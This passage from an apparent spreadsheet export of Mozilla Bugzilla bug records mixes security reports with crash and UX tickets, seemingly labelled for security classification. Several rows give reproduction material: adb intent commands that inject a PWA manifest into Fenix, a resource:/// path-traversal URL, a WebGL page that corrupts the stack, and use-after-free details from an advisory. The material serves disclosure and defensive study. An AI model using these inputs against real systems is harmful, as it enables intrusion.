      <c r="H2736" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2736" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J2736" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2736" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2736" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2736" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2736" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2736" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2736" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main83+]</t>
        </is>
      </c>
      <c r="Q2736" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2736" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2736" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2736" t="n">
        <v>1</v>
      </c>
      <c r="U2736" t="n">
        <v>0</v>
      </c>
      <c r="V2736" t="n">
        <v>18</v>
      </c>
      <c r="W2736" t="inlineStr">
        <is>
          <t>Created attachment 9167785
dummy_manifest.json
Fenix has a public interface that allows any apps to inject arbitrary PWA manifest for any origin.
That can be used for installing malicious PWAs on victim's device silently.
The installed PWA runs in fullscreen so spoofing address bar is possible by their contents.
Also through the malicious PWA's manifest, fake `share_target` (tries to steal victim's shared contents) can be registered (below).
https://github.com/mozilla-mobile/android-components/blob/ba0d00e94b15bb5ad1383c726a66340b80d6fe14/components/concept/engine/src/main/java/mozilla/components/concept/engine/manifest/WebAppManifestParser.kt#L79
The root cause is that `LauncherActivity` in Fenix is publicly accessible (below).
https://github.com/mozilla-mobile/fenix/blob/master/app/src/main/AndroidManifest.xml#L64
That activity receives MANIFEST_PATH key from incoming intent and store the specified manifest file to internal manifest database (below).
https://github.com/mozilla-mobile/fenix/blob/16b677693832d54c64f2ab1f67f0a881a704889d/app/src/main/java/org/mozilla/fenix/customtabs/FennecWebAppIntentProcessor.kt#L93
Here is the demo.
1) Save attached `dummy_manifest.json` file to your PC and send it to the connected Android device through ADB.
```
adb push dummy_manifest.json /data/local/tmp/dummy_manifest.json
```
2) Inject the manifest for example.com via `org.mozilla.gecko.WEBAPP` intent.
```
adb shell am start -a org.mozilla.gecko.WEBAPP -d 'https://example.com/' -n org.mozilla.fenix/org.mozilla.gecko.LauncherActivity --es MANIFEST_PATH /data/local/tmp/dummy_manifest.json
```
3) Then, example.com is shown in fullscreen (without address bar). That means PWA for example.com is injected.
4) Once inject the PWA, you can invoke through `mozilla.components.feature.pwa.VIEW_PWA` intent. Then, it runs again in fullsreen.
```
adb shell am start -a mozilla.components.feature.pwa.VIEW_PWA -d 'https://example.com/'
```
5) If you choose `Delete browsing data` from `Setting` menu, injected PWA can not be cleared.
   You need to remove all storage data of Fenix or re-install.</t>
        </is>
      </c>
      <c r="X2736" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2737">
      <c r="A2737" t="n">
        <v>634986</v>
      </c>
      <c r="B2737" t="inlineStr">
        <is>
          <t>2011-02-17 11:26:49 -0800</t>
        </is>
      </c>
      <c r="C2737" t="inlineStr">
        <is>
          <t>Use-after-free vulnerability in OBJECT's mChannel (ZDI-CAN-1032)</t>
        </is>
      </c>
      <c r="D2737" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2737" t="n">
        <v>1</v>
      </c>
      <c r="F2737" t="n">
        <v>1</v>
      </c>
      <c r="G2737" t="n">
        <v>3</v>
      </c>
      <c r="H2737" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2737" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2737" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2737" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2737" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2737" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2737" t="inlineStr">
        <is>
          <t>[sg:critical?][hardblocker][has patch]</t>
        </is>
      </c>
      <c r="Q2737" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2737" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2737" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T2737" t="n">
        <v>1</v>
      </c>
      <c r="U2737" t="n">
        <v>0</v>
      </c>
      <c r="V2737" t="n">
        <v>19</v>
      </c>
      <c r="W2737" t="inlineStr">
        <is>
          <t>The following was sent to security@mozilla.org today:
ZDI-CAN-1032: Mozilla Firefox OBJECT mChannel Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
    Mozilla Firefox
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.
The specific flaw exists within the OnChannelRedirect method. When an OBJECT element has no mChannel assigned, it is possible to call the |OnChannelRedirect| method, setting a nearly arbitrary object as the channel in use. |mChannel| will become a dangling pointer, allowing an attacker to execute arbitrary code under the context of the user running the browser.
Version(s)  tested: Firefox 3.6.13
Platform(s) tested: Windows XP SP3
From content/base/src/nsObjectLoadingContent.cpp:
nsObjectLoadingContent::OnChannelRedirect(nsIChannel *aOldChannel,
nsIChannel *aNewChannel,
PRUint32 aFlags)
{
// If we're already busy with a new load, cancel the redirect
if (aOldChannel != mChannel) {
return NS_BINDING_ABORTED;
}
if (mClassifier) {
mClassifier-&gt;OnRedirect(aOldChannel, aNewChannel);
}
mChannel = aNewChannel;
return NS_OK;
}
When an OBJECT element (implementation of nsIChannelEventSink interface) has no |mChannel| assigned, it is possible to call the |OnChannelRedirect| method, setting a nearly arbitrary object as the channel in use. The problem is that |mChannel| is a weak reference (as defined in content/base/src/nsObjectLoadingContent.h) and will become a dangling pointer after the garbage collection cycle.
The dangling pointer can be utilized by setting the "data" attribute to our OBJECT. This will call the |LoadObject| method, and load our OBJECT.
nsObjectLoadingContent::LoadObject(nsIURI* aURI,
                                   PRBool aNotify,
                                   const nsCString&amp; aTypeHint,
                                   PRBool aForceLoad)
{
  ...
  if (mChannel) {
    ...
    mChannel-&gt;Cancel(NS_BINDING_ABORTED);
    ...
  }
  ...
}
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2737" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2738">
      <c r="A2738" t="n">
        <v>1248794</v>
      </c>
      <c r="B2738" t="inlineStr">
        <is>
          <t>2016-02-16 15:03:36 -0800</t>
        </is>
      </c>
      <c r="C2738" t="inlineStr">
        <is>
          <t>crash in `anonymous namespace''::WindowsGamepadService::ScanForDevices</t>
        </is>
      </c>
      <c r="D2738" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2738" t="n">
        <v>1</v>
      </c>
      <c r="F2738" t="n">
        <v>1</v>
      </c>
      <c r="G2738" t="n">
        <v>3</v>
      </c>
      <c r="H2738" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2738" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2738" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2738" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L2738" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2738" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2738" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2738" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2738" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main45+]</t>
        </is>
      </c>
      <c r="Q2738" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2738" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2738" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2738" t="n">
        <v>1</v>
      </c>
      <c r="U2738" t="n">
        <v>0</v>
      </c>
      <c r="V2738" t="n">
        <v>16</v>
      </c>
      <c r="W2738" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-fc3e7119-b8f8-4b21-afe0-2d6f32160216.
=============================================================
Occurred when running 32-bit Firefox Nightly on emunittest 0.5 suite.</t>
        </is>
      </c>
      <c r="X2738" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2739">
      <c r="A2739" t="n">
        <v>1353437</v>
      </c>
      <c r="B2739" t="inlineStr">
        <is>
          <t>2017-04-04 09:45:32 -0700</t>
        </is>
      </c>
      <c r="C2739" t="inlineStr">
        <is>
          <t>[ux] SVG assets for new bookmark library animation</t>
        </is>
      </c>
      <c r="D2739" t="inlineStr">
        <is>
          <t>2017-07-18 12:39:07 -0700</t>
        </is>
      </c>
      <c r="E2739" t="n">
        <v>1</v>
      </c>
      <c r="F2739" t="n">
        <v>1</v>
      </c>
      <c r="G2739" t="n">
        <v>2</v>
      </c>
      <c r="H2739" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2739" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2739" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K2739" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L2739" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2739" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2739" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2739" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2739" t="inlineStr">
        <is>
          <t>[photon-animation] [ux]</t>
        </is>
      </c>
      <c r="Q2739" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2739" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2739" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2739" t="n">
        <v>1</v>
      </c>
      <c r="U2739" t="n">
        <v>0</v>
      </c>
      <c r="V2739" t="n">
        <v>24</v>
      </c>
      <c r="W2739" t="inlineStr">
        <is>
          <t>The new library animation shows a book being added to a shelf. We will need the SVG asset for this so we can use it in the animation.</t>
        </is>
      </c>
      <c r="X2739" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2740">
      <c r="A2740" t="n">
        <v>1433855</v>
      </c>
      <c r="B2740" t="inlineStr">
        <is>
          <t>2018-01-29 00:25:15 -0800</t>
        </is>
      </c>
      <c r="C2740" t="inlineStr">
        <is>
          <t>Crash in mozilla::plugins::FunctionBroker&lt;T&gt;::PostToDispatchThread</t>
        </is>
      </c>
      <c r="D2740" t="inlineStr">
        <is>
          <t>2018-02-07 15:23:23 -0800</t>
        </is>
      </c>
      <c r="E2740" t="n">
        <v>1</v>
      </c>
      <c r="F2740" t="n">
        <v>1</v>
      </c>
      <c r="G2740" t="n">
        <v>3</v>
      </c>
      <c r="H2740" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2740" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2740" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K2740" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2740" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2740" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2740" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2740" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2740" t="inlineStr"/>
      <c r="Q2740" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2740" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2740" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T2740" t="n">
        <v>1</v>
      </c>
      <c r="U2740" t="n">
        <v>0</v>
      </c>
      <c r="V2740" t="n">
        <v>18</v>
      </c>
      <c r="W2740" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-fd382b98-2a80-4aec-89e4-abd060180129.
=============================================================
Top 10 frames of crashing thread:
0 ntdll.dll NtWaitForKeyedEvent 
1 ntdll.dll RtlSleepConditionVariableCS 
2 kernel32.dll SleepConditionVariableCS 
3 mozglue.dll mozilla::detail::ConditionVariableImpl::wait mozglue/misc/ConditionVariable_windows.cpp:58
4 xul.dll mozilla::CondVar::Wait xpcom/threads/CondVar.h:68
5 xul.dll mozilla::plugins::FunctionBroker&lt;1, short &gt;::PostToDispatchThread dom/plugins/ipc/FunctionBroker.h:1447
6 xul.dll mozilla::plugins::FunctionBroker&lt;1, short &gt;::BrokerCallClient dom/plugins/ipc/FunctionBroker.h:1340
7 xul.dll mozilla::plugins::FunctionBroker&lt;1, short &gt;::MaybeBrokerCallClient dom/plugins/ipc/FunctionBroker.h:1313
8 xul.dll mozilla::plugins::FunctionBroker&lt;1, short &gt;::InterceptorStub dom/plugins/ipc/FunctionBroker.h:1231
9 npswf64_28_0_0_137.dll F905260817____________________________ F_578802783_______________________________________________________________:6145
=============================================================
There are 14 crashes (from are 8 installations) in nightly 60 with buildid 20180128220152. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1382251.
[1] https://hg.mozilla.org/mozilla-central/rev?node=1e37c536895f</t>
        </is>
      </c>
      <c r="X2740" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2741">
      <c r="A2741" t="n">
        <v>380994</v>
      </c>
      <c r="B2741" t="inlineStr">
        <is>
          <t>2007-05-17 00:49:49 -0700</t>
        </is>
      </c>
      <c r="C2741" t="inlineStr">
        <is>
          <t>Fix for bug 367428 lets through escaped slashes on Linux (windows too on trunk)</t>
        </is>
      </c>
      <c r="D2741" t="inlineStr">
        <is>
          <t>2009-05-08 13:57:35 -0700</t>
        </is>
      </c>
      <c r="E2741" t="n">
        <v>1</v>
      </c>
      <c r="F2741" t="n">
        <v>1</v>
      </c>
      <c r="G2741" t="n">
        <v>3</v>
      </c>
      <c r="H2741" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2741" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2741" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2741" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2741" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2741" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2741" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2741" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2741" t="inlineStr">
        <is>
          <t>[sg:dos]</t>
        </is>
      </c>
      <c r="Q2741" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2741" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2741" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T2741" t="n">
        <v>1</v>
      </c>
      <c r="U2741" t="n">
        <v>1</v>
      </c>
      <c r="V2741" t="n">
        <v>45</v>
      </c>
      <c r="W2741" t="inlineStr">
        <is>
          <t>STEPS TO REPRODUCE:
1)  Open browser on Linux
2)  Load resource:///..%2F..%2F..%2F in it
EXPECTED RESULTS:  Don't see file list for an ancestor of the install directory
ACTUAL RESULTS: I'm looking at a listing of ~bzbarsky (since the browser is installed under ~bzbarsky/mozilla/nightly/install-dir).</t>
        </is>
      </c>
      <c r="X2741" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2742">
      <c r="A2742" t="n">
        <v>702773</v>
      </c>
      <c r="B2742" t="inlineStr">
        <is>
          <t>2011-11-15 14:15:45 -0800</t>
        </is>
      </c>
      <c r="C2742" t="inlineStr">
        <is>
          <t>Installing apps online will automatically install them natively on the user's machine</t>
        </is>
      </c>
      <c r="D2742" t="inlineStr">
        <is>
          <t>2011-12-08 13:45:47 -0800</t>
        </is>
      </c>
      <c r="E2742" t="n">
        <v>1</v>
      </c>
      <c r="F2742" t="n">
        <v>1</v>
      </c>
      <c r="G2742" t="n">
        <v>5</v>
      </c>
      <c r="H2742" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2742" t="inlineStr">
        <is>
          <t>Web Apps</t>
        </is>
      </c>
      <c r="J2742" t="inlineStr">
        <is>
          <t>Extension</t>
        </is>
      </c>
      <c r="K2742" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2742" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2742" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2742" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2742" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2742" t="inlineStr"/>
      <c r="Q2742" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2742" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2742" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2742" t="n">
        <v>1</v>
      </c>
      <c r="U2742" t="n">
        <v>0</v>
      </c>
      <c r="V2742" t="n">
        <v>7</v>
      </c>
      <c r="W2742" t="inlineStr">
        <is>
          <t>The current behavior of the extension is that if you install an app online, it will automatically install it natively as well. This could be an annoyance for the user if icons are always being displayed on their desktop (in Windows). I'm not familiar with security and native apps but it could be a security issue if a malicious app is installed. Or another case is that if the user installs an app to their Dashboard on another person's computer, then the app will be installed natively on that computer as well.
I think the power/choice should be given to the user to determine if they want a native app or not. Just opening for discussion.</t>
        </is>
      </c>
      <c r="X2742" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2743">
      <c r="A2743" t="n">
        <v>667011</v>
      </c>
      <c r="B2743" t="inlineStr">
        <is>
          <t>2011-06-24 12:10:47 -0700</t>
        </is>
      </c>
      <c r="C2743" t="inlineStr">
        <is>
          <t>WeakMap values can be incorrectly classified as garbage by cycle collector</t>
        </is>
      </c>
      <c r="D2743" t="inlineStr">
        <is>
          <t>2011-09-22 15:32:02 -0700</t>
        </is>
      </c>
      <c r="E2743" t="n">
        <v>1</v>
      </c>
      <c r="F2743" t="n">
        <v>1</v>
      </c>
      <c r="G2743" t="n">
        <v>3</v>
      </c>
      <c r="H2743" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2743" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2743" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2743" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2743" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2743" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2743" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2743" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2743" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q2743" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2743" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2743" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T2743" t="n">
        <v>1</v>
      </c>
      <c r="U2743" t="n">
        <v>0</v>
      </c>
      <c r="V2743" t="n">
        <v>22</v>
      </c>
      <c r="W2743" t="inlineStr">
        <is>
          <t>Igor pointed out that the patch in Bug 653248 will probably lead to the cycle collector sometimes classifying reachable JS objects as unreachable, which in turn will lead to the CC incorrectly freeing DOM objects that are reachable from JS side.  I'm not sure what exactly happens, but I'd imagine that in the worst case it could make freed memory reachable from JS, potentially leading to crashes and other badness.
The scenario he came up with is this: a WeakMap m is reachable from JS roots, and m contains a key k and value v which are reachable only from DOM.  After the patch in Bug 653248, the GC will mark m black, and k and v grey.  When the cycle collector runs, its graph will have an edge from m to v, but not from k to v (which is wrong).  Because m is marked black, the CC will not traverse it.  If v is part of what looks like a garbage cycle through DOM, then the CC will mark v as garbage, as it doesn't see that k is holding on to v.  The DOM part of the cycle involving v will be freed, but this is still reachable from JS via m and k.
With the previous behavior, the GC would mark the value black if either the map or the key is reachable in any way (ie are marked black or grey).  This leaks, as it will never free cycles that pass through a WeakMap value, but is safe because it ensures that anything reachable from a reachable value is never freed.
The short term solution is to back out the patch in Bug 653248.
Longer term, the cycle collector needs a more accurate picture of the weak map edges.  It seems likely this will require making the cycle collector actually aware of WeakMaps.  The basic problem is that most edges act like an "or": if an object is reachable from any incoming edge, it is reachable.  For a weak map, the map and key act more like "and" wrt the value: both map and key must be reachable for the value to be reachable via the weak map.
I'll try to come up with a test for this.</t>
        </is>
      </c>
      <c r="X2743" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2744">
      <c r="A2744" t="n">
        <v>572129</v>
      </c>
      <c r="B2744" t="inlineStr">
        <is>
          <t>2010-06-15 08:32:25 -0700</t>
        </is>
      </c>
      <c r="C2744" t="inlineStr">
        <is>
          <t>Arbitrary code execution via browser's tab element that was dropped on the content area</t>
        </is>
      </c>
      <c r="D2744" t="inlineStr">
        <is>
          <t>2011-11-09 01:17:44 -0800</t>
        </is>
      </c>
      <c r="E2744" t="n">
        <v>1</v>
      </c>
      <c r="F2744" t="n">
        <v>1</v>
      </c>
      <c r="G2744" t="n">
        <v>3</v>
      </c>
      <c r="H2744" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2744" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2744" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2744" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2744" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2744" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2744" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2744" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2744" t="inlineStr">
        <is>
          <t>[sg:critical][stale][ccbr][partial fix in bug 572647][hardblocker][has patch]</t>
        </is>
      </c>
      <c r="Q2744" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2744" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2744" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2744" t="n">
        <v>1</v>
      </c>
      <c r="U2744" t="n">
        <v>0</v>
      </c>
      <c r="V2744" t="n">
        <v>57</v>
      </c>
      <c r="W2744" t="inlineStr">
        <is>
          <t>If a user drag a browser's tab element and drop it on the content area, a
content-registered drop event listener can access the tab element and its
properties including privileged functions.
Only drop event listeners can access privileged objects without the security
check.
http://hg.mozilla.org/mozilla-central/file/2348611d0230/content/events/src/nsDOMDataTransfer.cpp#l455</t>
        </is>
      </c>
      <c r="X2744" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2745">
      <c r="A2745" t="n">
        <v>777028</v>
      </c>
      <c r="B2745" t="inlineStr">
        <is>
          <t>2012-07-24 12:21:08 -0700</t>
        </is>
      </c>
      <c r="C2745" t="inlineStr">
        <is>
          <t>stack scribbling with 4-byte values choosable among a few values, when using more than 16 sampler uniforms, on Mesa, with all drivers</t>
        </is>
      </c>
      <c r="D2745" t="inlineStr">
        <is>
          <t>2024-05-29 16:03:02 -0700</t>
        </is>
      </c>
      <c r="E2745" t="n">
        <v>1</v>
      </c>
      <c r="F2745" t="n">
        <v>1</v>
      </c>
      <c r="G2745" t="n">
        <v>3</v>
      </c>
      <c r="H2745" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2745" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2745" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2745" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2745" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2745" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2745" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2745" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2745" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-] driver bug, affects other browsers</t>
        </is>
      </c>
      <c r="Q2745" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2745" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2745" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T2745" t="n">
        <v>1</v>
      </c>
      <c r="U2745" t="n">
        <v>0</v>
      </c>
      <c r="V2745" t="n">
        <v>88</v>
      </c>
      <c r="W2745" t="inlineStr">
        <is>
          <t>Created attachment 645425
reproduction case
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Steps to reproduce:
on linux, with decoders asan opt nightly build
I loaded:
&lt;html&gt;
  &lt;head&gt;
    &lt;script id="vshader" type="x-shader/x-vertex"&gt;
      void main()
      {
        vec4 x;
        gl_Position = x;
      }
    &lt;/script&gt;
    &lt;script id="fshader" type="x-shader/x-fragment"&gt;
      precision mediump float;
      uniform sampler2D uni[29];
      void main()
      {
        vec4 c;
        for (int i = 0; i &lt; 2; i++) {
          c += texture2D(uni[i], vec2(0));
        }
      }
    &lt;/script&gt;
    &lt;script&gt;
      function loadShaderFromScript(gl, name, shaderType) {
        var shader = gl.createShader(shaderType)
        var shaderSource = document.getElementById(name).text
        gl.shaderSource(shader, shaderSource)
        gl.compileShader(shader)
        return shader
      }
      onload = function() {
        var gl = document.createElement('canvas').getContext("moz-webgl")
        var program = gl.createProgram()
        gl.attachShader(program, loadShaderFromScript(gl, 'vshader', gl.VERTEX_SHADER))
        gl.attachShader(program, loadShaderFromScript(gl, 'fshader', gl.FRAGMENT_SHADER))
        gl.linkProgram(program)
      }
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
  &lt;/body&gt;
&lt;/html&gt;
Actual results:
==7388== ERROR: AddressSanitizer crashed on unknown address 0x7fff00000187 (pc 0x7fffbe4995c8 sp 0x7fffffff43d0 bp 0x7fffb8bc2980 T0)
AddressSanitizer can not provide additional info. ABORTING
    #0 0x7fffbe4995c8 in ?? ??:0
==18352== ERROR: AddressSanitizer crashed on unknown address 0x000700000007 (pc 0x000700000007 sp 0x7fffffff43d0 bp 0x000700000007 T0)
AddressSanitizer can not provide additional info. ABORTING
    #0 0x700000007
==29536== ERROR: AddressSanitizer crashed on unknown address 0x7ffffffff000 (pc 0x7fffbe0996a3 sp 0x7fffffff4290 bp 0x7fffb9b69db0 T0)
AddressSanitizer can not provide additional info. ABORTING
    #0 0x7fffbe0996a3 in ?? ??:0
I have seen these three asan outputs, they depend on the number on this line:
      uniform sampler2D uni[29];
29 is the lower bound, 65535 is the upper bound.</t>
        </is>
      </c>
      <c r="X2745" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2746">
      <c r="A2746" t="n">
        <v>882865</v>
      </c>
      <c r="B2746" t="inlineStr">
        <is>
          <t>2013-06-13 12:39:24 -0700</t>
        </is>
      </c>
      <c r="C2746" t="inlineStr">
        <is>
          <t>ASAN heap-buffer-overflow (read 1) in cryptojs_interpret_key_gen_type</t>
        </is>
      </c>
      <c r="D2746" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:14 -0800</t>
        </is>
      </c>
      <c r="E2746" t="n">
        <v>1</v>
      </c>
      <c r="F2746" t="n">
        <v>1</v>
      </c>
      <c r="G2746" t="n">
        <v>3</v>
      </c>
      <c r="H2746" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
